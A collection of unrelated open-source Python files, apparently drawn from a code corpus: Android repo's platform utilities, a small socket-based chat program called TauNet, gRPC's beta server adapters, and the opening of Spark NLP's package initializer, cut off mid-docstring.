if ("tensorforce" and self.agent.__name__) in str(classe):
self.agent = self.agent(env=self.env, device=self.device)._get()
return
self.agent = self.agent(env=self.env, device=self.device)._get()
def initWorker(self):
self.worker = Local_Worker(env=self.env, agent=self.agent)
def initEnv(self):
self.env = Local_env(mode=self.mode,
contract_type=self.contract_type, config=self.settings,
logger=self.logger, saver=self.saver, dataloader=self.dl)
def run(self):
if not self.agent:
raise ValueError("add an agent and load the session before running")
elif not self.env.stop:
self.logger.start()
Thread(target=self.worker.run).start()
else:
print (red("Warning : ")+"You cannot start the session without setting, "+\
"any data directory in {}environnement".format(self.config))
self.stop()
|
platform_utils.py
|
# -*- coding:utf-8 -*-
#
# Copyright (C) 2016 The Android Open Source Project
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import errno
import os
import platform
import select
import shutil
import stat
from pyversion import is_python3
if is_python3():
from queue import Queue
else:
from Queue import Queue
from threading import Thread
def isWindows():
""" Returns True when running with the native port of Python for Windows,
False when running on any other platform (including the Cygwin port of
Python).
"""
# Note: The cygwin port of Python returns "CYGWIN_NT_xxx"
return platform.system() == "Windows"
class FileDescriptorStreams(object):
""" Platform agnostic abstraction enabling non-blocking I/O over a
collection of file descriptors. This abstraction is required because
fctnl(os.O_NONBLOCK) is not supported on Windows.
"""
@classmethod
def create(cls):
""" Factory method: instantiates the concrete class according to the
current platform.
"""
if isWindows():
return _FileDescriptorStreamsThreads()
else:
return _FileDescriptorStreamsNonBlocking()
def __init__(self):
self.streams = []
def add(self, fd, dest, std_name):
""" Wraps an existing file descriptor as a stream.
"""
self.streams.append(self._create_stream(fd, dest, std_name))
def remove(self, stream):
""" Removes a stream, when done with it.
"""
self.streams.remove(stream)
@property
def is_done(self):
""" Returns True when all streams have been processed.
"""
return len(self.streams) == 0
def select(self):
""" Returns the set of streams that have data available to read.
The returned streams each expose a read() and a close() method.
When done with a stream, call the remove(stream) method.
"""
raise NotImplementedError
def _create_stream(self, fd, dest, std_name):
""" Creates a new stream wrapping an existing file descriptor.
"""
raise NotImplementedError
class _FileDescriptorStreamsNonBlocking(FileDescriptorStreams):
""" Implementation of FileDescriptorStreams for platforms that support
non blocking I/O.
"""
class Stream(object):
""" Encapsulates a file descriptor """
def __init__(self, fd, dest, std_name):
self.fd = fd
self.dest = dest
self.std_name = std_name
self.set_non_blocking()
def set_non_blocking(self):
import fcntl
flags = fcntl.fcntl(self.fd, fcntl.F_GETFL)
fcntl.fcntl(self.fd, fcntl.F_SETFL, flags | os.O_NONBLOCK)
def fileno(self):
return self.fd.fileno()
def read(self):
return self.fd.read(4096)
def close(self):
self.fd.close()
def _create_stream(self, fd, dest, std_name):
return self.Stream(fd, dest, std_name)
def select(self):
ready_streams, _, _ = select.select(self.streams, [], [])
return ready_streams
class _FileDescriptorStreamsThreads(FileDescriptorStreams):
""" Implementation of FileDescriptorStreams for platforms that don't support
non blocking I/O. This implementation requires creating threads issuing
blocking read operations on file descriptors.
"""
def __init__(self):
super(_FileDescriptorStreamsThreads, self).__init__()
# The queue is shared accross all threads so we can simulate the
# behavior of the select() function
self.queue = Queue(10) # Limit incoming data from streams
def _create_stream(self, fd, dest, std_name):
return self.Stream(fd, dest, std_name, self.queue)
def select(self):
# Return only one stream at a time, as it is the most straighforward
# thing to do and it is compatible with the select() function.
item = self.queue.get()
stream = item.stream
stream.data = item.data
return [stream]
class QueueItem(object):
""" Item put in the shared queue """
def __init__(self, stream, data):
self.stream = stream
self.data = data
class Stream(object):
""" Encapsulates a file descriptor """
def __init__(self, fd, dest, std_name, queue):
self.fd = fd
self.dest = dest
self.std_name = std_name
self.queue = queue
self.data = None
self.thread = Thread(target=self.read_to_queue)
self.thread.daemon = True
self.thread.start()
def close(self):
self.fd.close()
def read(self):
data = self.data
self.data = None
return data
def read_to_queue(self):
""" The thread function: reads everything from the file descriptor into
the shared queue and terminates when reaching EOF.
"""
for line in iter(self.fd.readline, b''):
self.queue.put(_FileDescriptorStreamsThreads.QueueItem(self, line))
self.fd.close()
self.queue.put(_FileDescriptorStreamsThreads.QueueItem(self, b''))
def symlink(source, link_name):
"""Creates a symbolic link pointing to source named link_name.
Note: On Windows, source must exist on disk, as the implementation needs
to know whether to create a "File" or a "Directory" symbolic link.
"""
if isWindows():
import platform_utils_win32
source = _validate_winpath(source)
link_name = _validate_winpath(link_name)
target = os.path.join(os.path.dirname(link_name), source)
if isdir(target):
platform_utils_win32.create_dirsymlink(_makelongpath(source), link_name)
else:
platform_utils_win32.create_filesymlink(_makelongpath(source), link_name)
else:
return os.symlink(source, link_name)
def _validate_winpath(path):
path = os.path.normpath(path)
if _winpath_is_valid(path):
return path
raise ValueError("Path \"%s\" must be a relative path or an absolute "
"path starting with a drive letter".format(path))
def _winpath_is_valid(path):
"""Windows only: returns True if path is relative (e.g. ".\\foo") or is
absolute including a drive letter (e.g. "c:\\foo"). Returns False if path
is ambiguous (e.g. "x:foo" or "\\foo").
"""
assert isWindows()
path = os.path.normpath(path)
drive, tail = os.path.splitdrive(path)
if tail:
if not drive:
return tail[0] != os.sep # "\\foo" is invalid
else:
return tail[0] == os.sep # "x:foo" is invalid
else:
return not drive # "x:" is invalid
def _makelongpath(path):
"""Return the input path normalized to support the Windows long path syntax
("\\\\?\\" prefix) if needed, i.e. if the input path is longer than the
MAX_PATH limit.
"""
if isWindows():
# Note: MAX_PATH is 260, but, for directories, the maximum value is actually 246.
if len(path) < 246:
return path
if path.startswith(u"\\\\?\\"):
return path
if not os.path.isabs(path):
return path
# Append prefix and ensure unicode so that the special longpath syntax
# is supported by underlying Win32 API calls
return u"\\\\?\\" + os.path.normpath(path)
else:
return path
def rmtree(path, ignore_errors=False):
"""shutil.rmtree(path) wrapper with support for long paths on Windows.
Availability: Unix, Windows."""
onerror = None
if isWindows():
path = _makelongpath(path)
onerror = handle_rmtree_error
shutil.rmtree(path, ignore_errors=ignore_errors, onerror=onerror)
def handle_rmtree_error(function, path, excinfo):
# Allow deleting read-only files
os.chmod(path, stat.S_IWRITE)
function(path)
def rename(src, dst):
"""os.rename(src, dst) wrapper with support for long paths on Windows.
Availability: Unix, Windows."""
if isWindows():
# On Windows, rename fails if destination exists, see
# https://docs.python.org/2/library/os.html#os.rename
try:
os.rename(_makelongpath(src), _makelongpath(dst))
except OSError as e:
if e.errno == errno.EEXIST:
os.remove(_makelongpath(dst))
os.rename(_makelongpath(src), _makelongpath(dst))
else:
raise
else:
os.rename(src, dst)
def remove(path):
"""Remove (delete) the file path. This is a replacement for os.remove that
allows deleting read-only files on Windows, with support for long paths and
for deleting directory symbolic links.
Availability: Unix, Windows."""
if isWindows():
longpath = _makelongpath(path)
try:
os.remove(longpath)
except OSError as e:
if e.errno == errno.EACCES:
os.chmod(longpath, stat.S_IWRITE)
# Directory symbolic links must be deleted with 'rmdir'.
if islink(longpath) and isdir(longpath):
os.rmdir(longpath)
else:
os.remove(longpath)
else:
raise
else:
os.remove(path)
def walk(top, topdown=True, onerror=None, followlinks=False):
"""os.walk(path) wrapper with support for long paths on Windows.
Availability: Windows, Unix.
"""
if isWindows():
return _walk_windows_impl(top, topdown, onerror, followlinks)
else:
return os.walk(top, topdown, onerror, followlinks)
def _walk_windows_impl(top, topdown, onerror, followlinks):
try:
names = listdir(top)
except Exception as err:
if onerror is not None:
onerror(err)
return
dirs, nondirs = [], []
for name in names:
if isdir(os.path.join(top, name)):
dirs.append(name)
else:
nondirs.append(name)
if topdown:
yield top, dirs, nondirs
for name in dirs:
new_path = os.path.join(top, name)
if followlinks or not islink(new_path):
for x in _walk_windows_impl(new_path, topdown, onerror, followlinks):
yield x
if not topdown:
yield top, dirs, nondirs
def listdir(path):
"""os.listdir(path) wrapper with support for long paths on Windows.
Availability: Windows, Unix.
"""
return os.listdir(_makelongpath(path))
def rmdir(path):
"""os.rmdir(path) wrapper with support for long paths on Windows.
Availability: Windows, Unix.
"""
os.rmdir(_makelongpath(path))
def isdir(path):
"""os.path.isdir(path) wrapper with support for long paths on Windows.
Availability: Windows, Unix.
"""
return os.path.isdir(_makelongpath(path))
def islink(path):
"""os.path.islink(path) wrapper with support for long paths on Windows.
Availability: Windows, Unix.
"""
if isWindows():
import platform_utils_win32
return platform_utils_win32.islink(_makelongpath(path))
else:
return os.path.islink(path)
def readlink(path):
"""Return a string representing the path to which the symbolic link
points. The result may be either an absolute or relative pathname;
if it is relative, it may be converted to an absolute pathname using
os.path.join(os.path.dirname(path), result).
Availability: Windows, Unix.
"""
if isWindows():
import platform_utils_win32
return platform_utils_win32.readlink(_makelongpath(path))
else:
return os.readlink(path)
def realpath(path):
"""Return the canonical path of the specified filename, eliminating
any symbolic links encountered in the path.
Availability: Windows, Unix.
"""
if isWindows():
current_path = os.path.abspath(path)
path_tail = []
for c in range(0, 100): # Avoid cycles
if islink(current_path):
target = readlink(current_path)
current_path = os.path.join(os.path.dirname(current_path), target)
else:
basename = os.path.basename(current_path)
if basename == '':
path_tail.append(current_path)
break
path_tail.append(basename)
current_path = os.path.dirname(current_path)
path_tail.reverse()
result = os.path.normpath(os.path.join(*path_tail))
return result
else:
return os.path.realpath(path)
|
main.py
|
# Copyright (c) 2015 Gregory Gaston
# License: https://opensource.org/licenses/MIT
# This file contains the main() function for the TauNet system as
# well as many of the basic functions involved with sending messages
# recieving messages, and the program interface.
# Built in libraries
import socket, threading, time, os
# my libraries
import protocol, saber, messages, user_func
# <<<< <<<< <<<< Globals Variable >>>> >>>> >>>> #
port = 6283
myip = socket.gethostbyname(socket.gethostname())
my_user_name = ''
TauNet_version = '1.0'
protocol_version = '0.2'
filename = ''
input_message = '' #Global variable
TIMEOUT = 8
MAX_MESSAGE_LENGTH = 600
key = ''
# <<<< <<<< <<<< MESSAGING FUNCTIONS >>>> >>>> >>>> #
# Functions dealing with the sending and recieveing of messages.
# Sends a message based on the user_info
def send_message(user_info, my_info, message, key):
# Package
pay = protocol.write_message(user_info, my_info, message, protocol_version)
# Encrypt
enc_pay = saber.encrypt(pay.encode(), 20, key)
# Convert to string
str_enc_pay = ''
for i in range(len(enc_pay)):
str_enc_pay = str_enc_pay + chr(enc_pay[i])
# Send payload
s = socket.socket(socket.AF_INET , socket.SOCK_STREAM)
s.settimeout(TIMEOUT)
s.connect((user_info[1], port)) # connet() takes tuple (user_ip, port#)
assert s
s.send(str_enc_pay.encode()) #encode converts message to bin
s.shutdown(1)
s.close()
return
# Listens for incoming messages
# Run as a seporate thread
def listen(user_list, message_hist):
s = socket.socket(socket.AF_INET , socket.SOCK_STREAM)
assert s
s.bind(('', 6283))
while 1:
s.listen(1)
assert s
(conn , addr) = s.accept()
mess = conn.recv(1024).decode() #decode convers from bin to string
#Hangs untill message is recieved
assert mess
## FORK HERE TO DECODE WHILE STILL BEING ABLE TO ACCEPT A NEW MESSAGE
#convert to list
mess_list = [ord(mess[i]) for i in range(len(mess))]
# decrypt
dec_mess = saber.decrypt(mess_list, 20, user_list.key)
# convert to string
message = ''
for i in range(len(dec_mess)):
message = message + chr(dec_mess[i])
rec_mess = protocol.read_message(message) #piece out message
assert rec_mess
if not rec_mess or rec_mess[2] == '' or rec_mess[2] == '\n': ##Empty message recieved
None
elif(user_list.search_users(rec_mess[0][0])):
print('\n' + rec_mess[0][0] + ':\t' + rec_mess[2] + '\n' + input_message, end = '')
message_hist.add_message(rec_mess[0][0], rec_mess[1][0], rec_mess[2])
else:
#Send error message
print('\n<<Message recieved from unknon user and discarded>>\n' + input_message, end = '')
return
# <<<< <<<< <<<< COMMAND FUNCTIONS >>>> >>>> >>>> #
# This section contains functions pertaining to the different
# commands that are accepted by the TauNet command prompt.
# Breaks a command in to it's pieces
def read_command(command):
if not command:
return None
length = len(command)
i = 1
part1 = part2 = None
while i < length and command[i] != ' ':
i = i + 1
part1 = command[1:i]
part2 = command[i+1:length]
return (part1, part2)
#@user message
def at(user_info, message):
message_end = None
while message:
if len(message) > MAX_MESSAGE_LENGTH:
message_end = message[MAX_MESSAGE_LENGTH:]
message = message[:MAX_MESSAGE_LENGTH]
else:
message_end = None
resend = True
while resend:
try:
send_message(user_info, (my_user_name, myip), message, key)
except:# TimeoutError:
if input("Error:\n * Unable to send message to " + user_info[0] + ". Attempt to resend message? (y/n) " ) == 'n':
resend = False
else:
resend = False
message = message_end
time.sleep(0.1) #make sure we don't overload someone else's reciever
return None
# Help menu
def help_menu():
print(" Command | Description")
print(" ----------------------+-------------------------------------------------------")
print(" ? | Displays this dialogue")
print(" @user_name Message | Sends 'user_name' 'Message'")
print(" @ Message | Sends 'Message' to the last 'user_name' messaged")
print(" +user_name ip_address | Adds 'user_name' to the list of users at 'ip_address.'")
print(" -user_name | Remove 'user_name' from the list of users.")
print(" #n | Displays the last 'n' messages from 1 to 20")
print(" | if n is not specified prints the last message")
# print(" #user_name n | Displays the last 'n' messages (to and) from user_name")
print(" ~ | Displays all networked users and their address")
# print(" ~user_name | Displays user_name's information")
print(" !CLEAR | Clear the Screen")
print(" !EXIT | Exit the program")
print(" ----------------------+-------------------------------------------------------")
return None
# Clear the display:
def clear():
try:
if os.name == 'nt':
clear = os.system('cls')
else:
clear = os.system('clear')
except: None
return None
# <<<< <<<< <<<< MAIN >>>> >>>> >>>> #
# The main execution branch for TauNet.
def main(LMT= False):
# Declair Globals that will be set
global my_user_name, key, filename, input_message
# LONG MESSAGE TESTING:
if LMT:
assert open("test_file.txt")
user_list = user_func.u_list("test_file.txt")
message_hist = messages.message_list()
my_user_name = user_list.me
key = user_list.key
user_info = old_user = None
listen_thread = threading.Thread(target=listen, args = (user_list, message_hist,))
listen_thread.daemon = True
listen_thread.start()
message = ''
l = int(input("Message Max Length == " + str(MAX_MESSAGE_LENGTH) +"\nLength of string to send: "))
n = int(input("Number of times to send full message: "))
for i in range(l):
message = message + str(i%10)
for i in range(n):
at(('user1', '127.0.0.1'), message)
return None
# END LONG MESSAGE TESTING
# Main proper
print(" _ __ __ ____ ____ \n" +
" _____ ___ __ __/ | / /__ / /_ _ __ \ // __ \ \n" +
" / __/ __ `/ / / / |/ / _ \/ __/ | | / / / // / / / \n" +
" / /_/ /_/ / /_/ / /| / __/ /_ | |/ / / // /_/ / \n" +
" \__/\__,_/\__,_/_/ |_/\___/\__/ |___/ /_(_)____/ \n" +
"\n")
## ASCII TEXT ART FROM: http://patorjk.com/software/taag/#p=display&f=Slant
# Select file to open
while True:
filename = input("Enter TauNet filename, type 'new' to create new TauNet, or type '!EXIT' to exit.\n: >> ")
if filename == '!EXIT':
return None
elif filename == 'new':
user_list = user_func.u_list()
user_list.input_u_list()
else:
try:
open(filename)
except IOError:
print(filename + " does not exist.")
if input("Would you like to create it? (y/n): ") == 'y':
user_list = user_func.u_list()
user_list.input_u_list(filename)
break
else:
user_list = user_func.u_list(filename)
break
# Set up local variables
message_hist = messages.message_list()
user_info = old_user = None
# Set up global variable
my_user_name = user_list.me
key = user_list.key
filename = user_list.filename
input_message = "TauNet (" + filename + ") v" + TauNet_version + ">> "
# Start Listening for incoming messages
listen_thread = threading.Thread(target=listen, args = (user_list, message_hist,))
listen_thread.daemon = True
listen_thread.start()
# Menu loop
while True:
split_command = None
command = input('\n' + input_message)
if command == '':
None# Do nothing
# Send a message to a user
elif command[0] == '@':
user_name, message = read_command(command)
if(user_name != ''):
old_user = user_info
user_info = None
user_info = user_list.search_users(user_name)
if user_info: #send the message
at(user_info, message)
else:
user_info = old_user
print("Error:\n * Invalid Command. ? for help.") ##Invalid user_name
# Add a user to the list
elif command[0] == '+':
split_command = read_command(command)
if (split_command[0] != '' and split_command[1] != '' and
user_func.valid_user(split_command[0]) and
user_list.add_user(split_command)):
user_list.write_file()
else:
print("Error:\n * Users name may only contain uppercase and lowercase letters from a-z, the numbers from 0-9, and the - symbol.\n * User names must also not have already been added to the list.")
# Remove a user from the list
elif command[0] == '-':
if command == '-':
print("Error:\n * Invalid Command. ? for help.")
elif user_list.remove_user(command[1:]):
user_list.write_file()
user_info = None
# Display the last n messages
# or the last message
elif command[0] == '#':
try:
lines = int(command[1:])
except:
lines = -1
if lines > 0 and lines < 21:
message_hist.print_n(lines)
else:
print("Error:\n * n must be a whole number from 1 to 20 represented in digits.")
# Display the list of users
elif command == '~':
user_list.print_users(); print()
# Display help menue
elif command == '?':
help_menu()
# Clear the Screen
elif command == '!CLEAR':
clear()
# Exit the program
elif command == '!EXIT':
return
#Invalid command
else:
print("Error:\n * Invalid Command. ? for help.")
return None
if __name__ == "__main__":
clear()
main()
clear()
|
_server_adaptations.py
|
# Copyright 2016 gRPC authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Translates gRPC's server-side API into gRPC's server-side Beta API."""
import collections
import threading
import grpc
from grpc import _common
from grpc.beta import _metadata
from grpc.beta import interfaces
from grpc.framework.common import cardinality
from grpc.framework.common import style
from grpc.framework.foundation import abandonment
from grpc.framework.foundation import logging_pool
from grpc.framework.foundation import stream
from grpc.framework.interfaces.face import face
# pylint: disable=too-many-return-statements
_DEFAULT_POOL_SIZE = 8
class _ServerProtocolContext(interfaces.GRPCServicerContext):
def __init__(self, servicer_context):
self._servicer_context = servicer_context
def peer(self):
return self._servicer_context.peer()
def disable_next_response_compression(self):
pass # TODO(https://github.com/grpc/grpc/issues/4078): design, implement.
class _FaceServicerContext(face.ServicerContext):
def __init__(self, servicer_context):
self._servicer_context = servicer_context
def is_active(self):
return self._servicer_context.is_active()
def time_remaining(self):
return self._servicer_context.time_remaining()
def add_abortion_callback(self, abortion_callback):
raise NotImplementedError(
'add_abortion_callback no longer supported server-side!')
def cancel(self):
self._servicer_context.cancel()
def protocol_context(self):
return _ServerProtocolContext(self._servicer_context)
def invocation_metadata(self):
return _metadata.beta(self._servicer_context.invocation_metadata())
def initial_metadata(self, initial_metadata):
self._servicer_context.send_initial_metadata(
_metadata.unbeta(initial_metadata))
def terminal_metadata(self, terminal_metadata):
self._servicer_context.set_terminal_metadata(
_metadata.unbeta(terminal_metadata))
def code(self, code):
self._servicer_context.set_code(code)
def details(self, details):
self._servicer_context.set_details(details)
def _adapt_unary_request_inline(unary_request_inline):
def adaptation(request, servicer_context):
return unary_request_inline(request,
_FaceServicerContext(servicer_context))
return adaptation
def _adapt_stream_request_inline(stream_request_inline):
def adaptation(request_iterator, servicer_context):
return stream_request_inline(request_iterator,
_FaceServicerContext(servicer_context))
return adaptation
class _Callback(stream.Consumer):
def __init__(self):
self._condition = threading.Condition()
self._values = []
self._terminated = False
self._cancelled = False
def consume(self, value):
with self._condition:
self._values.append(value)
self._condition.notify_all()
def terminate(self):
with self._condition:
self._terminated = True
self._condition.notify_all()
def consume_and_terminate(self, value):
with self._condition:
self._values.append(value)
self._terminated = True
self._condition.notify_all()
def cancel(self):
with self._condition:
self._cancelled = True
self._condition.notify_all()
def draw_one_value(self):
with self._condition:
while True:
if self._cancelled:
raise abandonment.Abandoned()
elif self._values:
return self._values.pop(0)
elif self._terminated:
return None
else:
self._condition.wait()
def draw_all_values(self):
with self._condition:
while True:
if self._cancelled:
raise abandonment.Abandoned()
elif self._terminated:
all_values = tuple(self._values)
self._values = None
return all_values
else:
self._condition.wait()
def _run_request_pipe_thread(request_iterator, request_consumer,
servicer_context):
thread_joined = threading.Event()
def pipe_requests():
for request in request_iterator:
if not servicer_context.is_active() or thread_joined.is_set():
return
request_consumer.consume(request)
if not servicer_context.is_active() or thread_joined.is_set():
return
request_consumer.terminate()
request_pipe_thread = threading.Thread(target=pipe_requests)
request_pipe_thread.daemon = True
request_pipe_thread.start()
def _adapt_unary_unary_event(unary_unary_event):
def adaptation(request, servicer_context):
callback = _Callback()
if not servicer_context.add_callback(callback.cancel):
raise abandonment.Abandoned()
unary_unary_event(request, callback.consume_and_terminate,
_FaceServicerContext(servicer_context))
return callback.draw_all_values()[0]
return adaptation
def _adapt_unary_stream_event(unary_stream_event):
def adaptation(request, servicer_context):
callback = _Callback()
if not servicer_context.add_callback(callback.cancel):
raise abandonment.Abandoned()
unary_stream_event(request, callback,
_FaceServicerContext(servicer_context))
while True:
response = callback.draw_one_value()
if response is None:
return
else:
yield response
return adaptation
def _adapt_stream_unary_event(stream_unary_event):
def adaptation(request_iterator, servicer_context):
callback = _Callback()
if not servicer_context.add_callback(callback.cancel):
raise abandonment.Abandoned()
request_consumer = stream_unary_event(
callback.consume_and_terminate,
_FaceServicerContext(servicer_context))
_run_request_pipe_thread(request_iterator, request_consumer,
servicer_context)
return callback.draw_all_values()[0]
return adaptation
def _adapt_stream_stream_event(stream_stream_event):
def adaptation(request_iterator, servicer_context):
callback = _Callback()
if not servicer_context.add_callback(callback.cancel):
raise abandonment.Abandoned()
request_consumer = stream_stream_event(
callback, _FaceServicerContext(servicer_context))
_run_request_pipe_thread(request_iterator, request_consumer,
servicer_context)
while True:
response = callback.draw_one_value()
if response is None:
return
else:
yield response
return adaptation
class _SimpleMethodHandler(
collections.namedtuple('_MethodHandler', (
'request_streaming',
'response_streaming',
'request_deserializer',
'response_serializer',
'unary_unary',
'unary_stream',
'stream_unary',
'stream_stream',
)), grpc.RpcMethodHandler):
pass
def _simple_method_handler(implementation, request_deserializer,
response_serializer):
if implementation.style is style.Service.INLINE:
if implementation.cardinality is cardinality.Cardinality.UNARY_UNARY:
return _SimpleMethodHandler(False, False, request_deserializer,
response_serializer,
_adapt_unary_request_inline(
implementation.unary_unary_inline),
None, None, None)
elif implementation.cardinality is cardinality.Cardinality.UNARY_STREAM:
return _SimpleMethodHandler(False, True, request_deserializer,
response_serializer, None,
_adapt_unary_request_inline(
implementation.unary_stream_inline),
None, None)
elif implementation.cardinality is cardinality.Cardinality.STREAM_UNARY:
return _SimpleMethodHandler(True, False, request_deserializer,
response_serializer, None, None,
_adapt_stream_request_inline(
implementation.stream_unary_inline),
None)
elif implementation.cardinality is cardinality.Cardinality.STREAM_STREAM:
return _SimpleMethodHandler(
True, True, request_deserializer, response_serializer, None,
None, None,
_adapt_stream_request_inline(
implementation.stream_stream_inline))
elif implementation.style is style.Service.EVENT:
if implementation.cardinality is cardinality.Cardinality.UNARY_UNARY:
return _SimpleMethodHandler(False, False, request_deserializer,
response_serializer,
_adapt_unary_unary_event(
implementation.unary_unary_event),
None, None, None)
elif implementation.cardinality is cardinality.Cardinality.UNARY_STREAM:
return _SimpleMethodHandler(False, True, request_deserializer,
response_serializer, None,
_adapt_unary_stream_event(
implementation.unary_stream_event),
None, None)
elif implementation.cardinality is cardinality.Cardinality.STREAM_UNARY:
return _SimpleMethodHandler(True, False, request_deserializer,
response_serializer, None, None,
_adapt_stream_unary_event(
implementation.stream_unary_event),
None)
elif implementation.cardinality is cardinality.Cardinality.STREAM_STREAM:
return _SimpleMethodHandler(True, True, request_deserializer,
response_serializer, None, None, None,
_adapt_stream_stream_event(
implementation.stream_stream_event))
raise ValueError()
def _flatten_method_pair_map(method_pair_map):
method_pair_map = method_pair_map or {}
flat_map = {}
for method_pair in method_pair_map:
method = _common.fully_qualified_method(method_pair[0], method_pair[1])
flat_map[method] = method_pair_map[method_pair]
return flat_map
class _GenericRpcHandler(grpc.GenericRpcHandler):
def __init__(self, method_implementations, multi_method_implementation,
request_deserializers, response_serializers):
self._method_implementations = _flatten_method_pair_map(
method_implementations)
self._request_deserializers = _flatten_method_pair_map(
request_deserializers)
self._response_serializers = _flatten_method_pair_map(
response_serializers)
self._multi_method_implementation = multi_method_implementation
def service(self, handler_call_details):
method_implementation = self._method_implementations.get(
handler_call_details.method)
if method_implementation is not None:
return _simple_method_handler(method_implementation,
self._request_deserializers.get(
handler_call_details.method),
self._response_serializers.get(
handler_call_details.method))
elif self._multi_method_implementation is None:
return None
else:
try:
return None #TODO(nathaniel): call the multimethod.
except face.NoSuchMethodError:
return None
class _Server(interfaces.Server):
def __init__(self, grpc_server):
self._grpc_server = grpc_server
def add_insecure_port(self, address):
return self._grpc_server.add_insecure_port(address)
def add_secure_port(self, address, server_credentials):
return self._grpc_server.add_secure_port(address, server_credentials)
def start(self):
self._grpc_server.start()
def stop(self, grace):
return self._grpc_server.stop(grace)
def __enter__(self):
self._grpc_server.start()
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self._grpc_server.stop(None)
return False
def server(service_implementations, multi_method_implementation,
request_deserializers, response_serializers, thread_pool,
thread_pool_size):
generic_rpc_handler = _GenericRpcHandler(
service_implementations, multi_method_implementation,
request_deserializers, response_serializers)
if thread_pool is None:
effective_thread_pool = logging_pool.pool(_DEFAULT_POOL_SIZE
if thread_pool_size is None
else thread_pool_size)
else:
effective_thread_pool = thread_pool
return _Server(
grpc.server(effective_thread_pool, handlers=(generic_rpc_handler,)))
|
__init__.py
|
# Copyright 2017-2021 John Snow Labs
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import sys
import subprocess
import threading
from pyspark.sql import SparkSession
from sparknlp import annotator
from sparknlp.base import DocumentAssembler, Finisher, EmbeddingsFinisher, TokenAssembler, Chunk2Doc, Doc2Chunk
from pyspark.conf import SparkConf
from pyspark.context import SparkContext
from pyspark.java_gateway import launch_gateway
sys.modules['com.johnsnowlabs.nlp.annotators'] = annotator
sys.modules['com.johnsnowlabs.nlp.annotators.tokenizer'] = annotator
sys.modules['com.johnsnowlabs.nlp.annotators.tokenizer.wordpiece'] = annotator
sys.modules['com.johnsnowlabs.nlp.annotators.ner'] = annotator
sys.modules['com.johnsnowlabs.nlp.annotators.ner.regex'] = annotator
sys.modules['com.johnsnowlabs.nlp.annotators.ner.crf'] = annotator
sys.modules['com.johnsnowlabs.nlp.annotators.ner.dl'] = annotator
sys.modules['com.johnsnowlabs.nlp.annotators.pos'] = annotator
sys.modules['com.johnsnowlabs.nlp.annotators.pos.perceptron'] = annotator
sys.modules['com.johnsnowlabs.nlp.annotators.sbd'] = annotator
sys.modules['com.johnsnowlabs.nlp.annotators.sbd.pragmatic'] = annotator
sys.modules['com.johnsnowlabs.nlp.annotators.sbd.deep'] = annotator
sys.modules['com.johnsnowlabs.nlp.annotators.sda'] = annotator
sys.modules['com.johnsnowlabs.nlp.annotators.sda.pragmatic'] = annotator
sys.modules['com.johnsnowlabs.nlp.annotators.sda.vivekn'] = annotator
sys.modules['com.johnsnowlabs.nlp.annotators.spell'] = annotator
sys.modules['com.johnsnowlabs.nlp.annotators.spell.norvig'] = annotator
sys.modules['com.johnsnowlabs.nlp.annotators.spell.symmetric'] = annotator
sys.modules['com.johnsnowlabs.nlp.annotators.parser'] = annotator
sys.modules['com.johnsnowlabs.nlp.annotators.parser.dep'] = annotator
sys.modules['com.johnsnowlabs.nlp.annotators.parser.typdep'] = annotator
sys.modules['com.johnsnowlabs.nlp.embeddings'] = annotator
sys.modules['com.johnsnowlabs.nlp.annotators.classifier'] = annotator
sys.modules['com.johnsnowlabs.nlp.annotators.classifier.dl'] = annotator
sys.modules['com.johnsnowlabs.nlp.annotators.spell.context'] = annotator
sys.modules['com.johnsnowlabs.nlp.annotators.ld'] = annotator
sys.modules['com.johnsnowlabs.nlp.annotators.ld.dl'] = annotator
sys.modules['com.johnsnowlabs.nlp.annotators.sentence_detector_dl'] = annotator
sys.modules['com.johnsnowlabs.nlp.annotators.seq2seq'] = annotator
sys.modules['com.johnsnowlabs.nlp.annotators.ws'] = annotator
sys.modules['com.johnsnowlabs.nlp.annotators.er'] = annotator
annotators = annotator
embeddings = annotator
def start(gpu=False,
spark23=False,
spark24=False,
memory="16G",
cache_folder="",
log_folder="",
cluster_tmp_dir="",
real_time_output=False,
output_level=1):
"""Starts a PySpark instance with default parameters for Spark NLP.
The default parameters would result in the equivalent of:
.. code-block:: python
:param gpu: start Spark NLP with GPU
:param spark23: start Spark NLP on Apache Spark 2.3.x
:param spark24: start Spark NLP on Apache Spark 2.4.x
:param memory: set driver memory for SparkSession
:param cache_folder: The location to download and exctract pretrained Models and Pipelines
:param log_folder: The location to save logs from annotators during training such as NerDLApproach,
ClassifierDLApproach, SentimentDLApproach, MultiClassifierDLApproach, etc.
:param cluster_tmp_dir: The location to use on a cluster for temporarily files
:param output_level: int, optional
Output level for logs, by default 1
:param real_time_output:
:substitutions:
SparkSession.builder \\
.appName("Spark NLP") \\
.master("local[*]") \\
.config("spark.driver.memory", "16G") \\
.config("spark.serializer", "org.apache.spark.serializer.KryoSerializer") \\
.config("spark.kryoserializer.buffer.max", "2000M") \\
.config("spark.driver.maxResultSize", "0") \\
.config("spark.jars.packages", "com.johnsnowlabs.nlp:spark-nlp_2.12:|release|") \\
.getOrCreate()
Parameters
----------
gpu : bool, optional
Whether to enable GPU acceleration (must be set up correctly), by default False
spark23 : bool, optional
Whether to use the Spark 2.3.x version of Spark NLP, by default False
spark24 : bool, optional
Whether to use the Spark 2.4.x version of Spark NLP, by default False
memory : str, optional
How much memory to allocate for the Spark driver, by default "16G"
real_time_output : bool, optional
Whether to ouput in real time, by default False
